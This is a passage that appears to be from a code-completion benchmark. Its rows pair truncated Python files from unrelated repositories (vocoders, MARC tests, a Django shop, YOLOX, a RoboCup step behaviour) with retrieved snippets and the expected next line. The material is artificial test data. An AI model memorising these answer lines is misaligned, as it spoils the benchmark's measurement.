def get_mel_24k(x):
return mel_spectrogram(x, 1024, h.num_mels, 24000, 240, 1024, h.fmin, 8000)
def scan_checkpoint(cp_dir, prefix):
pattern = os.path.join(cp_dir, prefix + '*')
cp_list = glob.glob(pattern)
if len(cp_list) == 0:
return ''
return sorted(cp_list)[-1]
def inference(a):
| from __future__ import absolute_import, division, print_function, unicode_literals
h = None
device = None
def load_checkpoint(filepath, device):
assert os.path.isfile(filepath)
print("Loading '{}'".format(filepath))
checkpoint_dict = torch.load(filepath, map_location=device)
print("Complete.")
return checkpoint_dict
def get_mel(x):
return mel_spectrogram(x, h.n_fft, h.num_mels, h.sampling_rate, h.hop_size, h.win_size, h.fmin, h.fmax)
def get_mel_24k(x):
return mel_spectrogram(x, 1024, h.num_mels, 24000, 240, 1024, h.fmin, 8000)
def scan_checkpoint(cp_dir, prefix):
pattern = os.path.join(cp_dir, prefix + '*')
cp_list = glob.glob(pattern)
if len(cp_list) == 0:
return ''
return sorted(cp_list)[-1]
def inference(a): | generator = Generator(h).to(device) | 4 | 2023-12-16 01:21:00+00:00 | 2k |
edsu/marctable | test_marctable.py | [
{
"identifier": "MARC",
"path": "marctable/marc.py",
"snippet": "class MARC:\n def __init__(self) -> None:\n self.fields: List[Field] = []\n\n @cache\n def get_field(self, tag: str) -> Field:\n for field in self.fields:\n if field.tag == tag:\n return field\n raise SchemaFieldError(f\"{tag} is not a defined field tag in Avram schema\")\n\n @cache\n def get_subfield(self, tag: str, code: str) -> Subfield:\n field = self.get_field(tag)\n return field.get_subfield(code)\n\n @property\n def avram_file(self) -> pathlib.Path:\n return pathlib.Path(__file__).parent / \"marc.json\"\n\n @classmethod\n @cache\n def from_avram(cls: Type[\"MARC\"], avram_file: Optional[IO] = None) -> \"MARC\":\n marc = MARC()\n\n if avram_file is None:\n avram_file = marc.avram_file.open(\"r\")\n\n for d in json.load(avram_file)[\"fields\"].values():\n marc.fields.append(Field.from_dict(d))\n\n return marc\n\n def to_avram(self, avram_file: Optional[IO] = None) -> None:\n if avram_file is None:\n avram_file = self.avram_file.open(\"w\")\n\n d = {\n \"title\": \"MARC21 bibliographic format\",\n \"url\": \"https://www.loc.gov/marc/bibliographic/\",\n \"family\": \"marc\",\n \"language\": \"en\",\n \"fields\": {f.tag: f.to_dict() for f in self.fields},\n }\n json.dump(d, avram_file, indent=2)"
},
{
"identifier": "SchemaFieldError",
"path": "marctable/marc.py",
"snippet": "class SchemaFieldError(Exception):\n pass"
},
{
"identifier": "SchemaSubfieldError",
"path": "marctable/marc.py",
"snippet": "class SchemaSubfieldError(Exception):\n pass"
},
{
"identifier": "crawl",
"path": "marctable/marc.py",
"snippet": "def crawl(n: int = 0, quiet: bool = False, outfile: IO = sys.stdout) -> None:\n marc = MARC()\n for f in fields():\n marc.fields.append(f)\n if not quiet:\n print(f)\n if n != 0 and len(marc.fields) >= n:\n break\n marc.to_avram(outfile)"
},
{
"identifier": "_mapping",
"path": "marctable/utils.py",
"snippet": "def _mapping(rules: list) -> dict:\n \"\"\"\n unpack the mapping rules into a dictionary for easy lookup\n\n >>> _mapping([\"245\", \"260ac\"])\n {'245': None, '260': ['a', 'c']}\n \"\"\"\n marc = MARC.from_avram()\n if rules is None or len(rules) == 0:\n rules = [field.tag for field in marc.fields]\n\n m = {}\n for rule in rules:\n field_tag = rule[0:3]\n if marc.get_field(field_tag) is None:\n raise Exception(f\"unknown MARC field in mapping rule: {rule}\")\n\n subfields = set(list(rule[3:]))\n for subfield_code in subfields:\n if marc.get_subfield(field_tag, subfield_code) is None:\n raise Exception(f\"unknown MARC subfield in mapping rule: {rule}\")\n\n m[field_tag] = subfields or None\n\n return m"
},
{
"identifier": "dataframe_iter",
"path": "marctable/utils.py",
"snippet": "def dataframe_iter(\n marc_input: BinaryIO, rules: list = [], batch: int = 1000\n) -> Generator[DataFrame, None, None]:\n columns = _columns(_mapping(rules))\n for records_batch in records_iter(marc_input, rules, batch):\n yield DataFrame.from_records(records_batch, columns=columns)"
},
{
"identifier": "to_csv",
"path": "marctable/utils.py",
"snippet": "def to_csv(\n marc_input: BinaryIO,\n csv_output: TextIO,\n rules: list = [],\n batch: int = 1000,\n) -> None:\n \"\"\"\n Convert MARC to CSV.\n \"\"\"\n first_batch = True\n for df in dataframe_iter(marc_input, rules=rules, batch=batch):\n df.to_csv(csv_output, header=first_batch, index=False)\n first_batch = False"
},
{
"identifier": "to_dataframe",
"path": "marctable/utils.py",
"snippet": "def to_dataframe(marc_input: BinaryIO, rules: list = []) -> DataFrame:\n \"\"\"\n Return a single DataFrame for the entire dataset.\n \"\"\"\n return next(dataframe_iter(marc_input, rules, batch=0))"
},
{
"identifier": "to_parquet",
"path": "marctable/utils.py",
"snippet": "def to_parquet(\n marc_input: BinaryIO,\n parquet_output: IOBase,\n rules: list = [],\n batch: int = 1000,\n) -> None:\n \"\"\"\n Convert MARC to Parquet.\n \"\"\"\n schema = _make_parquet_schema(rules)\n writer = ParquetWriter(parquet_output, schema, compression=\"SNAPPY\")\n for records_batch in records_iter(marc_input, rules=rules, batch=batch):\n table = pyarrow.Table.from_pylist(records_batch, schema)\n writer.write_table(table)\n\n writer.close()"
}
] | import json
import pathlib
import pandas
from io import StringIO
from marctable.marc import MARC, SchemaFieldError, SchemaSubfieldError, crawl
from marctable.utils import _mapping, dataframe_iter, to_csv, to_dataframe, to_parquet
from pytest import raises | 1,565 |
marc = MARC.from_avram()
def test_crawl() -> None:
# crawl the first 10 field definitions from the loc site (to save time)
outfile = StringIO()
crawl(10, quiet=True, outfile=outfile)
outfile.seek(0)
# ensure the Avram JSON parses and looks ok
schema = json.load(outfile)
assert schema
assert len(schema["fields"]) == 10
# ensure that the Avram JSON for a field looks ok
assert schema["fields"]["015"]
f015 = schema["fields"]["015"]
assert f015["label"] == "National Bibliography Number"
assert f015["url"] == "https://www.loc.gov/marc/bibliographic/bd015.html"
assert len(f015["subfields"]) == 6
# ensure that the Avram JSON for a subfield looks ok
assert f015["subfields"]["2"]
f0152 = f015["subfields"]["2"]
assert f0152["label"] == "Source"
assert f0152["code"] == "2"
assert f0152["repeatable"] is False
def test_marc() -> None:
assert len(marc.fields) == 215
def test_get_field() -> None:
assert marc.get_field("245")
|
marc = MARC.from_avram()
def test_crawl() -> None:
# crawl the first 10 field definitions from the loc site (to save time)
outfile = StringIO()
crawl(10, quiet=True, outfile=outfile)
outfile.seek(0)
# ensure the Avram JSON parses and looks ok
schema = json.load(outfile)
assert schema
assert len(schema["fields"]) == 10
# ensure that the Avram JSON for a field looks ok
assert schema["fields"]["015"]
f015 = schema["fields"]["015"]
assert f015["label"] == "National Bibliography Number"
assert f015["url"] == "https://www.loc.gov/marc/bibliographic/bd015.html"
assert len(f015["subfields"]) == 6
# ensure that the Avram JSON for a subfield looks ok
assert f015["subfields"]["2"]
f0152 = f015["subfields"]["2"]
assert f0152["label"] == "Source"
assert f0152["code"] == "2"
assert f0152["repeatable"] is False
def test_marc() -> None:
assert len(marc.fields) == 215
def test_get_field() -> None:
assert marc.get_field("245") | with raises(SchemaFieldError, match="abc is not a defined field tag in Avram"): | 1 | 2023-12-21 21:14:29+00:00 | 2k |
WangWenhao0716/ViT4ICD | Stage_23/dg/models_gem_waveblock_balance_cos/resnet_ibn.py | [
{
"identifier": "resnet50_ibn_a",
"path": "Stage_23/dg/models_gem_waveblock_balance_cos/resnet_ibn_a.py",
"snippet": "def resnet50_ibn_a(pretrained=False, **kwargs):\n \"\"\"Constructs a ResNet-50 model.\n Args:\n pretrained (bool): If True, returns a model pre-trained on ImageNet\n \"\"\"\n model = ResNet(Bottleneck, [3, 4, 6, 3], **kwargs)\n if pretrained:\n print(\"Loading a pre-trained model!\")\n state_dict = torch.load(model_urls['ibn_resnet50a'], map_location=torch.device('cpu'))['state_dict']\n state_dict = remove_module_key(state_dict)\n model.load_state_dict(state_dict)\n return model"
},
{
"identifier": "resnet101_ibn_a",
"path": "Stage_23/dg/models_gem_waveblock_balance_cos/resnet_ibn_a.py",
"snippet": "def resnet101_ibn_a(pretrained=False, **kwargs):\n \"\"\"Constructs a ResNet-101 model.\n Args:\n pretrained (bool): If True, returns a model pre-trained on ImageNet\n \"\"\"\n model = ResNet(Bottleneck, [3, 4, 23, 3], **kwargs)\n if pretrained:\n state_dict = torch.load(model_urls['ibn_resnet101a'], map_location=torch.device('cpu'))['state_dict']\n state_dict = remove_module_key(state_dict)\n model.load_state_dict(state_dict)\n return model"
},
{
"identifier": "GeneralizedMeanPoolingP",
"path": "Stage_23/dg/models_gem_waveblock_balance_cos/gem.py",
"snippet": "class GeneralizedMeanPoolingP(GeneralizedMeanPooling):\n \"\"\" Same, but norm is trainable\n \"\"\"\n\n def __init__(self, norm=3, output_size=1, eps=1e-6):\n super(GeneralizedMeanPoolingP, self).__init__(norm, output_size, eps)\n self.p = nn.Parameter(torch.ones(1) * norm)"
},
{
"identifier": "build_metric",
"path": "Stage_23/dg/models_gem_waveblock_balance_cos/metric.py",
"snippet": "def build_metric(loss_type, in_dim, out_dim, s=64, m=0.35, **kwargs):\n if (loss_type=='circle'):\n return CircleLoss(in_dim, out_dim, s, m)\n elif (loss_type=='arc'):\n return Arcface(in_dim, out_dim, s, m)\n elif (loss_type=='cos'):\n return MarginCosineProduct(in_dim, out_dim, s, m)\n elif (loss_type=='am'):\n return AMSoftmax(in_dim, out_dim, s, m)\n else:\n assert \"Unknown metric {}\".format(loss_type)"
}
] | from torch import nn
from torch.nn import functional as F
from torch.nn import init
from .resnet_ibn_a import resnet50_ibn_a, resnet101_ibn_a
from .gem import GeneralizedMeanPoolingP
from .metric import build_metric
import torchvision
import torch
import random | 827 | from __future__ import absolute_import
__all__ = ['ResNetIBN', 'resnet_ibn50a', 'resnet_ibn101a']
class Waveblock(nn.Module):
def __init__(self):
super().__init__()
def forward(self, x):
if self.training:
h, w = x.size()[-2:]
rh = round(0.3 * h)
sx = random.randint(0, h-rh)
mask = (x.new_ones(x.size()))*1.5
mask[:, :, sx:sx+rh, :] = 1
x = x * mask
return x
class ResNetIBN(nn.Module):
__factory = {
| from __future__ import absolute_import
__all__ = ['ResNetIBN', 'resnet_ibn50a', 'resnet_ibn101a']
class Waveblock(nn.Module):
def __init__(self):
super().__init__()
def forward(self, x):
if self.training:
h, w = x.size()[-2:]
rh = round(0.3 * h)
sx = random.randint(0, h-rh)
mask = (x.new_ones(x.size()))*1.5
mask[:, :, sx:sx+rh, :] = 1
x = x * mask
return x
class ResNetIBN(nn.Module):
__factory = { | '50a': resnet50_ibn_a, | 0 | 2023-12-17 11:32:48+00:00 | 2k |
Noubissie237/myShop | myShop/shop/views.py | [
{
"identifier": "commandeAnonyme",
"path": "myShop/shop/utiles.py",
"snippet": "def commandeAnonyme(request, data):\n print(\"utilisateur non authentifie\")\n\n print('cookies', request.COOKIES)\n \n name = data['form']['name']\n print('data', data)\n print('name', name)\n username = data['form']['username']\n email = data['form']['email']\n phone = data['form']['phone']\n\n cookie_panier = panier_cookie(request)\n articles = cookie_panier['articles']\n\n client, created = Client.objects.get_or_create(\n email = email\n )\n \n client.name = name\n client.save()\n\n\n commande = Commande.objects.create(\n client=client\n )\n\n for article in articles:\n produit = Produit.objects.get(id=article['produit']['id'])\n\n CommandeArticle.objects.create(\n produit=produit,\n commande = commande,\n quantite = article['quantite']\n )\n\n return client, commande"
},
{
"identifier": "data_cookie",
"path": "myShop/shop/utiles.py",
"snippet": "def data_cookie(request):\n\n if request.user.is_authenticated:\n\n client = request.user.client\n\n commande, created = Commande.objects.get_or_create(client=client, complete=False)\n\n articles = commande.commandearticle_set.all()\n\n \n nombre_article = commande.get_panier_article\n\n else:\n \n cookie_panier = panier_cookie(request)\n articles = cookie_panier['articles']\n commande = cookie_panier['commande']\n nombre_article = cookie_panier['nombre_article']\n\n context = {\n 'articles': articles,\n 'commande': commande,\n 'nombre_article': nombre_article\n }\n\n return context"
},
{
"identifier": "panier_cookie",
"path": "myShop/shop/utiles.py",
"snippet": "def panier_cookie(request):\n try: \n panier = json.loads(request.COOKIES.get('panier'))\n except:\n panier = {} \n\n articles = []\n\n commande = {\n 'get_panier_total':0,\n 'get_panier_article':0,\n 'produit_physique':False,\n }\n\n nombre_article = commande['get_panier_article']\n try:\n\n for obj in panier:\n nombre_article += panier[obj]['qte']\n\n produit = Produit.objects.get(id=obj)\n\n total = (produit.price * panier[obj]['qte'])\n\n commande['get_panier_article'] += panier[obj]['qte']\n\n commande['get_panier_total'] += total\n\n article = {\n 'produit':{\n 'id': produit.id,\n 'name': produit.name,\n 'price': produit.price,\n 'imageUrl': produit.imageUrl\n },\n\n 'quantite': panier[obj]['qte'],\n 'get_total': total\n }\n\n articles.append(article)\n\n if produit.digital == False:\n commande['produit_physique'] = True\n \n except:\n pass \n\n context = {\n 'articles': articles,\n 'commande': commande,\n 'nombre_article': nombre_article\n } \n\n return context"
}
] | from django.shortcuts import render
from .models import *
from django.http import JsonResponse
from datetime import datetime
from .utiles import commandeAnonyme, data_cookie, panier_cookie
import json | 1,373 |
def shop(request, *args, **kwargs):
""" vue principale """
produits = Produit.objects.all()
data = data_cookie(request)
nombre_article = data['nombre_article']
context = {
'produits':produits,
'nombre_article': nombre_article
}
return render(request, 'shop/index.html', context)
def panier(request, *args, **kwargs):
""" panier """
data = data_cookie(request)
articles = data['articles']
commande = data['commande']
nombre_article = data['nombre_article']
context = {
'articles':articles,
'commande':commande,
'nombre_article':nombre_article
}
return render(request, 'shop/panier.html', context)
def commande(request, *args, **kwargs):
""" Commande """
data = data_cookie(request)
articles = data['articles']
commande = data['commande']
nombre_article = data['nombre_article']
context = {
'articles':articles,
'commande':commande,
'nombre_article': nombre_article
}
return render(request, 'shop/commande.html', context)
def update_article(request, *args, **kwargs):
data = json.loads(request.body)
produit_id = data['produit_id']
action = data['action']
client = request.user.client
produit = Produit.objects.get(id=produit_id)
commande, created = Commande.objects.get_or_create(client=client, complete=False)
commande_article, created = CommandeArticle.objects.get_or_create(commande=commande, produit=produit)
if action == 'add':
commande_article.quantite += 1
if action == 'remove':
commande_article.quantite -= 1
commande_article.save()
if commande_article.quantite <= 0:
commande_article.delete()
return JsonResponse("Article ajouté", safe=False)
def traitementCommande(request, *args, **kwargs):
""" traitement, validation de la com;ande et verification de l'integrite des donnees(detection de fraude)"""
STATUS_TRANSACTION = ['ACCEPTED', 'COMPLETED', 'SUCESS']
transaction_id = datetime.now().timestamp()
data = json.loads(request.body)
print(data)
if request.user.is_authenticated:
client = request.user.client
commande, created = Commande.objects.get_or_create(client=client, complete=False)
else:
|
def shop(request, *args, **kwargs):
""" vue principale """
produits = Produit.objects.all()
data = data_cookie(request)
nombre_article = data['nombre_article']
context = {
'produits':produits,
'nombre_article': nombre_article
}
return render(request, 'shop/index.html', context)
def panier(request, *args, **kwargs):
""" panier """
data = data_cookie(request)
articles = data['articles']
commande = data['commande']
nombre_article = data['nombre_article']
context = {
'articles':articles,
'commande':commande,
'nombre_article':nombre_article
}
return render(request, 'shop/panier.html', context)
def commande(request, *args, **kwargs):
""" Commande """
data = data_cookie(request)
articles = data['articles']
commande = data['commande']
nombre_article = data['nombre_article']
context = {
'articles':articles,
'commande':commande,
'nombre_article': nombre_article
}
return render(request, 'shop/commande.html', context)
def update_article(request, *args, **kwargs):
data = json.loads(request.body)
produit_id = data['produit_id']
action = data['action']
client = request.user.client
produit = Produit.objects.get(id=produit_id)
commande, created = Commande.objects.get_or_create(client=client, complete=False)
commande_article, created = CommandeArticle.objects.get_or_create(commande=commande, produit=produit)
if action == 'add':
commande_article.quantite += 1
if action == 'remove':
commande_article.quantite -= 1
commande_article.save()
if commande_article.quantite <= 0:
commande_article.delete()
return JsonResponse("Article ajouté", safe=False)
def traitementCommande(request, *args, **kwargs):
""" traitement, validation de la com;ande et verification de l'integrite des donnees(detection de fraude)"""
STATUS_TRANSACTION = ['ACCEPTED', 'COMPLETED', 'SUCESS']
transaction_id = datetime.now().timestamp()
data = json.loads(request.body)
print(data)
if request.user.is_authenticated:
client = request.user.client
commande, created = Commande.objects.get_or_create(client=client, complete=False)
else: | client, commande = commandeAnonyme(request, data) | 0 | 2023-12-15 08:06:59+00:00 | 2k |
alibaba/u2mot | yolox/models/yolo_fpn.py | [
{
"identifier": "Darknet",
"path": "yolox/models/darknet.py",
"snippet": "class Darknet(nn.Module):\n # number of blocks from dark2 to dark5.\n depth2blocks = {21: [1, 2, 2, 1], 53: [2, 8, 8, 4]}\n\n def __init__(\n self,\n depth,\n in_channels=3,\n stem_out_channels=32,\n out_features=(\"dark3\", \"dark4\", \"dark5\"),\n ):\n \"\"\"\n Args:\n depth (int): depth of darknet used in model, usually use [21, 53] for this param.\n in_channels (int): number of input channels, for example, use 3 for RGB image.\n stem_out_channels (int): number of output chanels of darknet stem.\n It decides channels of darknet layer2 to layer5.\n out_features (Tuple[str]): desired output layer name.\n \"\"\"\n super().__init__()\n assert out_features, \"please provide output features of Darknet\"\n self.out_features = out_features\n self.stem = nn.Sequential(\n BaseConv(in_channels, stem_out_channels, ksize=3, stride=1, act=\"lrelu\"),\n *self.make_group_layer(stem_out_channels, num_blocks=1, stride=2),\n )\n in_channels = stem_out_channels * 2 # 64\n\n num_blocks = Darknet.depth2blocks[depth]\n # create darknet with `stem_out_channels` and `num_blocks` layers.\n # to make model structure more clear, we don't use `for` statement in python.\n self.dark2 = nn.Sequential(\n *self.make_group_layer(in_channels, num_blocks[0], stride=2)\n )\n in_channels *= 2 # 128\n self.dark3 = nn.Sequential(\n *self.make_group_layer(in_channels, num_blocks[1], stride=2)\n )\n in_channels *= 2 # 256\n self.dark4 = nn.Sequential(\n *self.make_group_layer(in_channels, num_blocks[2], stride=2)\n )\n in_channels *= 2 # 512\n\n self.dark5 = nn.Sequential(\n *self.make_group_layer(in_channels, num_blocks[3], stride=2),\n *self.make_spp_block([in_channels, in_channels * 2], in_channels * 2),\n )\n\n def make_group_layer(self, in_channels: int, num_blocks: int, stride: int = 1):\n \"starts with conv layer then has `num_blocks` `ResLayer`\"\n return [\n BaseConv(in_channels, in_channels * 2, ksize=3, stride=stride, act=\"lrelu\"),\n *[(ResLayer(in_channels * 2)) for _ in range(num_blocks)],\n ]\n\n def make_spp_block(self, filters_list, in_filters):\n m = nn.Sequential(\n *[\n BaseConv(in_filters, filters_list[0], 1, stride=1, act=\"lrelu\"),\n BaseConv(filters_list[0], filters_list[1], 3, stride=1, act=\"lrelu\"),\n SPPBottleneck(\n in_channels=filters_list[1],\n out_channels=filters_list[0],\n activation=\"lrelu\",\n ),\n BaseConv(filters_list[0], filters_list[1], 3, stride=1, act=\"lrelu\"),\n BaseConv(filters_list[1], filters_list[0], 1, stride=1, act=\"lrelu\"),\n ]\n )\n return m\n\n def forward(self, x):\n outputs = {}\n x = self.stem(x)\n outputs[\"stem\"] = x\n x = self.dark2(x)\n outputs[\"dark2\"] = x\n x = self.dark3(x)\n outputs[\"dark3\"] = x\n x = self.dark4(x)\n outputs[\"dark4\"] = x\n x = self.dark5(x)\n outputs[\"dark5\"] = x\n return {k: v for k, v in outputs.items() if k in self.out_features}"
},
{
"identifier": "BaseConv",
"path": "yolox/models/network_blocks.py",
"snippet": "class BaseConv(nn.Module):\n \"\"\"A Conv2d -> Batchnorm -> silu/leaky relu block\"\"\"\n\n def __init__(\n self, in_channels, out_channels, ksize, stride, groups=1, bias=False, act=\"silu\"\n ):\n super().__init__()\n # use same padding\n pad = (ksize - 1) // 2\n self.conv = nn.Conv2d(\n in_channels,\n out_channels,\n kernel_size=ksize,\n stride=stride,\n padding=pad,\n groups=groups,\n bias=bias,\n )\n self.bn = nn.BatchNorm2d(out_channels)\n self.act = get_activation(act, inplace=True)\n\n def forward(self, x):\n '''\n x --> Conv2d --> BN --> activation --> x\n '''\n return self.act(self.bn(self.conv(x))) # Conv ==> BN ==> activate\n\n def fuseforward(self, x):\n return self.act(self.conv(x))"
}
] | import torch
import torch.nn as nn
from .darknet import Darknet
from .network_blocks import BaseConv | 1,525 | #!/usr/bin/env python3
# -*- encoding:utf-8 -*-
# Copyright (c) 2014-2021 Megvii Inc. All rights reserved.
# Copyright (c) Alibaba, Inc. and its affiliates.
class YOLOFPN(nn.Module):
"""
YOLOFPN module. Darknet 53 is the default backbone of this model.
"""
def __init__(
self,
depth=53,
in_features=["dark3", "dark4", "dark5"],
):
super().__init__()
self.backbone = Darknet(depth)
self.in_features = in_features
# out 1
self.out1_cbl = self._make_cbl(512, 256, 1)
self.out1 = self._make_embedding([256, 512], 512 + 256)
# out 2
self.out2_cbl = self._make_cbl(256, 128, 1)
self.out2 = self._make_embedding([128, 256], 256 + 128)
# upsample
self.upsample = nn.Upsample(scale_factor=2, mode="nearest")
def _make_cbl(self, _in, _out, ks):
| #!/usr/bin/env python3
# -*- encoding:utf-8 -*-
# Copyright (c) 2014-2021 Megvii Inc. All rights reserved.
# Copyright (c) Alibaba, Inc. and its affiliates.
class YOLOFPN(nn.Module):
"""
YOLOFPN module. Darknet 53 is the default backbone of this model.
"""
def __init__(
self,
depth=53,
in_features=["dark3", "dark4", "dark5"],
):
super().__init__()
self.backbone = Darknet(depth)
self.in_features = in_features
# out 1
self.out1_cbl = self._make_cbl(512, 256, 1)
self.out1 = self._make_embedding([256, 512], 512 + 256)
# out 2
self.out2_cbl = self._make_cbl(256, 128, 1)
self.out2 = self._make_embedding([128, 256], 256 + 128)
# upsample
self.upsample = nn.Upsample(scale_factor=2, mode="nearest")
def _make_cbl(self, _in, _out, ks): | return BaseConv(_in, _out, ks, stride=1, act="lrelu") | 1 | 2023-12-18 10:04:40+00:00 | 2k |
liuhuang31/HiFTNet-sr | models.py | [
{
"identifier": "init_weights",
"path": "utils.py",
"snippet": "def init_weights(m, mean=0.0, std=0.01):\n classname = m.__class__.__name__\n if classname.find(\"Conv\") != -1:\n m.weight.data.normal_(mean, std)"
},
{
"identifier": "get_padding",
"path": "utils.py",
"snippet": "def get_padding(kernel_size, dilation=1):\n return int((kernel_size*dilation - dilation)/2)"
},
{
"identifier": "TorchSTFT",
"path": "stft.py",
"snippet": "class TorchSTFT(torch.nn.Module):\n def __init__(self, filter_length=800, hop_length=200, win_length=800, window='hann'):\n super().__init__()\n self.filter_length = filter_length\n self.hop_length = hop_length\n self.win_length = win_length\n self.window = torch.from_numpy(get_window(window, win_length, fftbins=True).astype(np.float32))\n\n def transform(self, input_data):\n forward_transform = torch.stft(\n input_data,\n self.filter_length, self.hop_length, self.win_length, window=self.window.to(input_data.device),\n return_complex=True)\n\n return torch.abs(forward_transform), torch.angle(forward_transform)\n\n def inverse(self, magnitude, phase):\n inverse_transform = torch.istft(\n magnitude * torch.exp(phase * 1j),\n self.filter_length, self.hop_length, self.win_length, window=self.window.to(magnitude.device))\n\n return inverse_transform.unsqueeze(-2) # unsqueeze to stay consistent with conv_transpose1d implementation\n\n def forward(self, input_data):\n self.magnitude, self.phase = self.transform(input_data)\n reconstruction = self.inverse(self.magnitude, self.phase)\n return reconstruction"
}
] | import torch
import torch.nn.functional as F
import torch.nn as nn
import numpy as np
from torch.nn import Conv1d, ConvTranspose1d, AvgPool1d, Conv2d
from torch.nn.utils import weight_norm, remove_weight_norm, spectral_norm
from utils import init_weights, get_padding
from stft import TorchSTFT | 645 |
LRELU_SLOPE = 0.1
class ResBlock1(torch.nn.Module):
def __init__(self, h, channels, kernel_size=3, dilation=(1, 3, 5)):
super(ResBlock1, self).__init__()
self.h = h
self.convs1 = nn.ModuleList([
weight_norm(Conv1d(channels, channels, kernel_size, 1, dilation=dilation[0],
padding=get_padding(kernel_size, dilation[0]))),
weight_norm(Conv1d(channels, channels, kernel_size, 1, dilation=dilation[1],
padding=get_padding(kernel_size, dilation[1]))),
weight_norm(Conv1d(channels, channels, kernel_size, 1, dilation=dilation[2],
padding=get_padding(kernel_size, dilation[2])))
])
|
LRELU_SLOPE = 0.1
class ResBlock1(torch.nn.Module):
def __init__(self, h, channels, kernel_size=3, dilation=(1, 3, 5)):
super(ResBlock1, self).__init__()
self.h = h
self.convs1 = nn.ModuleList([
weight_norm(Conv1d(channels, channels, kernel_size, 1, dilation=dilation[0],
padding=get_padding(kernel_size, dilation[0]))),
weight_norm(Conv1d(channels, channels, kernel_size, 1, dilation=dilation[1],
padding=get_padding(kernel_size, dilation[1]))),
weight_norm(Conv1d(channels, channels, kernel_size, 1, dilation=dilation[2],
padding=get_padding(kernel_size, dilation[2])))
]) | self.convs1.apply(init_weights) | 0 | 2023-12-16 03:53:55+00:00 | 2k |
m-abr/FCPCodebase | behaviors/custom/Step/Step.py | [
{
"identifier": "Base_Agent",
"path": "agent/Base_Agent.py",
"snippet": "class Base_Agent():\n all_agents = []\n\n def __init__(self, host:str, agent_port:int, monitor_port:int, unum:int, robot_type:int, team_name:str, enable_log:bool=True,\n enable_draw:bool=True, apply_play_mode_correction:bool=True, wait_for_server:bool=True, hear_callback=None) -> None:\n\n self.radio = None # hear_message may be called during Server_Comm instantiation\n self.logger = Logger(enable_log, f\"{team_name}_{unum}\")\n self.world = World(robot_type, team_name, unum, apply_play_mode_correction, enable_draw, self.logger, host)\n self.world_parser = World_Parser(self.world, self.hear_message if hear_callback is None else hear_callback)\n self.scom = Server_Comm(host,agent_port,monitor_port,unum,robot_type,team_name,self.world_parser,self.world,Base_Agent.all_agents,wait_for_server)\n self.inv_kinematics = Inverse_Kinematics(self.world.robot)\n self.behavior = Behavior(self)\n self.path_manager = Path_Manager(self.world)\n self.radio = Radio(self.world, self.scom.commit_announcement)\n self.behavior.create_behaviors()\n Base_Agent.all_agents.append(self)\n\n @abstractmethod\n def think_and_send(self):\n pass\n\n def hear_message(self, msg:bytearray, direction, timestamp:float) -> None:\n if direction != \"self\" and self.radio is not None:\n self.radio.receive(msg)\n\n def terminate(self):\n # close shared monitor socket if this is the last agent on this thread\n self.scom.close(close_monitor_socket=(len(Base_Agent.all_agents)==1))\n Base_Agent.all_agents.remove(self)\n\n @staticmethod\n def terminate_all():\n for o in Base_Agent.all_agents:\n o.scom.close(True) # close shared monitor socket, if it exists\n Base_Agent.all_agents = []"
},
{
"identifier": "Step_Generator",
"path": "behaviors/custom/Step/Step_Generator.py",
"snippet": "class Step_Generator():\n GRAVITY = 9.81\n Z0 = 0.2\n \n def __init__(self, feet_y_dev, sample_time, max_ankle_z) -> None:\n self.feet_y_dev = feet_y_dev\n self.sample_time = sample_time\n self.state_is_left_active = False\n self.state_current_ts = 0\n self.switch = False # switch legs\n self.external_progress = 0 # non-overlaped progress\n self.max_ankle_z = max_ankle_z\n\n\n def get_target_positions(self, reset, ts_per_step, z_span, z_extension):\n '''\n Get target positions for each foot\n\n Returns\n -------\n target : `tuple`\n (Left leg y, Left leg z, Right leg y, Right leg z)\n '''\n\n assert type(ts_per_step)==int and ts_per_step > 0, \"ts_per_step must be a positive integer!\"\n\n #-------------------------- Advance 1ts\n if reset:\n self.ts_per_step = ts_per_step # step duration in time steps\n self.swing_height = z_span\n self.max_leg_extension = z_extension # maximum distance between ankle to center of both hip joints\n self.state_current_ts = 0\n self.state_is_left_active = False \n self.switch = False\n elif self.switch:\n self.state_current_ts = 0\n self.state_is_left_active = not self.state_is_left_active # switch leg\n self.switch = False\n else:\n self.state_current_ts += 1\n\n #-------------------------- Compute COM.y\n W = math.sqrt(self.Z0/self.GRAVITY)\n\n step_time = self.ts_per_step * self.sample_time\n time_delta = self.state_current_ts * self.sample_time\n \n y0 = self.feet_y_dev # absolute initial y value\n y_swing = y0 + y0 * ( math.sinh((step_time - time_delta)/W) + math.sinh(time_delta/W) ) / math.sinh(-step_time/W)\n\n #-------------------------- Cap maximum extension and swing height\n z0 = min(-self.max_leg_extension, self.max_ankle_z) # capped initial z value\n zh = min(self.swing_height, self.max_ankle_z - z0) # capped swing height\n\n #-------------------------- Compute Z Swing\n progress = self.state_current_ts / self.ts_per_step\n self.external_progress = self.state_current_ts / (self.ts_per_step-1)\n active_z_swing = zh * math.sin(math.pi * progress)\n\n #-------------------------- Accept new parameters after final step\n if self.state_current_ts + 1 >= self.ts_per_step:\n self.ts_per_step = ts_per_step # step duration in time steps\n self.swing_height = z_span\n self.max_leg_extension = z_extension # maximum distance between ankle to center of both hip joints\n self.switch = True\n\n #-------------------------- Distinguish active leg\n if self.state_is_left_active:\n return y0+y_swing, active_z_swing+z0, -y0+y_swing, z0\n else:\n return y0-y_swing, z0, -y0-y_swing, active_z_swing+z0"
}
] | from agent.Base_Agent import Base_Agent
from behaviors.custom.Step.Step_Generator import Step_Generator
import numpy as np | 1,450 |
class Step():
def __init__(self, base_agent : Base_Agent) -> None:
self.world = base_agent.world
self.ik = base_agent.inv_kinematics
self.description = "Step (Skill-Set-Primitive)"
self.auto_head = True
nao_specs = self.ik.NAO_SPECS
self.leg_length = nao_specs[1] + nao_specs[3] # upper leg height + lower leg height
feet_y_dev = nao_specs[0] * 1.2 # wider step
sample_time = self.world.robot.STEPTIME
max_ankle_z = nao_specs[5]
# Initialize step generator with constants
|
class Step():
def __init__(self, base_agent : Base_Agent) -> None:
self.world = base_agent.world
self.ik = base_agent.inv_kinematics
self.description = "Step (Skill-Set-Primitive)"
self.auto_head = True
nao_specs = self.ik.NAO_SPECS
self.leg_length = nao_specs[1] + nao_specs[3] # upper leg height + lower leg height
feet_y_dev = nao_specs[0] * 1.2 # wider step
sample_time = self.world.robot.STEPTIME
max_ankle_z = nao_specs[5]
# Initialize step generator with constants | self.step_generator = Step_Generator(feet_y_dev, sample_time, max_ankle_z) | 1 | 2023-12-16 23:40:23+00:00 | 2k |
koenhendriks/ha-button-plus | custom_components/button_plus/buttonplushub.py | [
{
"identifier": "LocalApiClient",
"path": "custom_components/button_plus/button_plus_api/local_api_client.py",
